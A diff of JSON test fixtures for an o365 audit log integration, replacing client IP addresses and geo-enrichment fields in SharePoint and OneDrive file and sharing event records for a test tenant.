@@ -583,25 +493,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png"
@@ -644,7 +536,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -656,12 +548,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703796200Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865172500Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -699,25 +591,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png"
@@ -760,7 +634,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -772,12 +646,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703797900Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865177200Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -815,25 +689,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png"
@@ -877,7 +733,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -889,12 +745,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703799600Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865180800Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -932,25 +788,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png"
@@ -993,7 +831,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -1005,12 +843,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703801300Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865185100Z", + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -1048,25 +886,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -1109,7 +929,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -1121,12 +941,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703803Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865190700Z", + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -1164,25 +984,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -1225,7 +1027,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -1237,12 +1039,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703804700Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865195600Z", + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json index d65020171e7..a5d38df6ca0 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json 
@@ -147,10 +147,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing 
Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003ccopyRoleAssignments\u003eFalse\u003c/copyRoleAssignments\u003e\u003cclearSubScopes\u003eFalse\u003c/clearSubScopes\u003e", 
@@ -176,10 +176,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
